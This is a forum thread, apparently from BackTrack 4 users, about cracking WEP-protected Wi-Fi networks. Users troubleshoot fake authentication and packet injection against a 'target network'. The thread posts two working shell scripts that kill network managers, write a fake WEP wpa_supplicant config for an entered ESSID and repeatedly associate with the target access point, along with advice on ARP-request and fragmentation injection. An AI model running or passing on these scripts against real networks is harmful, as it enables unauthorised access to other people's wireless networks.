i just try some scripts but....doesn't work!!!!!
Or you can do some research on your own and find one of the many solves already out there. Help yourself, don't wait for someone to do it for you....Originally Posted by the_shadow
first wep cracked but without AP association
lets wait to BT4 final to see if this problem is solved!!!
"The goal of every man should be to continue living even after he can no longer draw breath."
~ShadowKill
i just try some scripts but....doesn't work!!!!!
With my script, you do not enter the BSSID, you enter the ESSID, that is the NAME of the AP, NOT the series of 6 hex numbers.
Probably why some of you are having problems.
Your script works fine i managed to inject once and then on the same again later didn't work.
On my other router it freezes after a few hundred,
A question however:
What would happen if you have 2 with the same ESSID?
If they are on different channels then simply lock onto the channel with the essid you wish to crack. If they have the same essid and the same channel, then you would have to modify the script to also check for this then ask for the bssid as well, but this is an unlikely circumstance.
It's a simple script meant to take the work out of continuously modifying the wpa_supplicant config file every time you want to fakeauth, so I'm sure there is a lot that could be improved.
Sorry, but no, I do not put in the BSSID when the script asks, only the ESSID.
Maybe it's something wrong with the AP but I do not have anything else to test on.
My goal is to get to see how CUDA works.
After several days of trying to get this to work on my 4965; I finally got fake auth and injection working at the same time.
Finally tried a fresh copy of BT4 booting to a non-persist USB drive, BT4 out of the box.
I used the shell script Zermelo posted but I modified wep_key0 from 1801b56668 to "fakeauth". Without the quotes it would not work for me. It would successfully connect, but IV never increased while injecting. Both ARP Request and Fragmentation have been successful.
The only problem I've encountered is that it appears wpa_supplicant seems to loose the fake auth connection without notification. There are periods where my IV won't increase for a period of 60 sec. or more. It eventually corrects itself, or I manually kill the shell script and restart it and they start increasing again.
Code:#!/bin/sh rm fake.conf killall NetworkManager killall knetworkmanager killall wpa_supplicant clear echo -e "" echo "Enter the SSID of the Target Network:" read SEL echo 'network={ \n ssid="'$SEL'" \n key_mgmt=NONE \n wep_key0="fakeauth" \n }' > fake.conf echo -E "Starting Fake Authentication with "$SEL wpa_supplicant -c fake.conf -i wlan0 -Dwext
one question: echo "Enter the SSID of the Target Network:" i have to put the essid name? without ""???
Yes when running the script, once it asks for the SSID enter it exactly as it appears in airodump-ng, no quotes.
If you're using the modified script I posted, copy it into a file called fakeit . Give it execute permissions and run.
# ./fakeit
will ask for the SSID
enter it exactly and you should be good.
I'm still having problems with wpa_supplement losing the fake auth, forcing me to have to restart it.
So I added onto the shell script that was posted to continue to loop the fake auth connection.
If anyone else is having this problem, this will work around it. Run it, it will ask for the ESSID, the number of times to repeat, and the sec in between. Default times should be good enough for standard WEP crack.
Code:#!/bin/sh killall NetworkManager killall knetworkmanager killall wpa_supplicant clear echo "" echo "Enter the ESSID of the Target Network: (use last)" read SEL if [ $SEL ] then echo "" if [ -e fake.conf ]; then echo "Deleting old fake.conf" rm fake.conf fi echo 'network={ \n ssid="'$SEL'" \n key_mgmt=NONE \n wep_key0="fakeauth" \n }' > fake.conf echo "Starting Fake Authentication with $SEL" else if ! [ -e fake.conf ]; then echo "ERROR - No config found, Provide ESSID" exit 1 fi echo "" echo "Starting Fake Authentication with Previous ESSID" fi echo "" echo "How many times do you want to fake it? (30):" read TIMES if [ "$TIMES" = "" ]; then TIMES=30; fi echo "" echo "How many seconds between restarts? (45):" read SEC if [ "$SEC" = "" ]; then SEC=45; fi i=1 while [ $i -le $TIMES ] do wpa_supplicant -c fake.conf -i wlan0 -Dwext -B echo "" echo "Fake Auth Connection ($i of $TIMES) Success ...maybe check airodump-ng to be sure." i=`expr $i + 1` if [ $i -le $TIMES ]; then echo "Reconnecting in $SEC seconds" sleep $SEC echo "Faking orgasam again... uh! ah! That's the spot!" fi done
Posting Permissions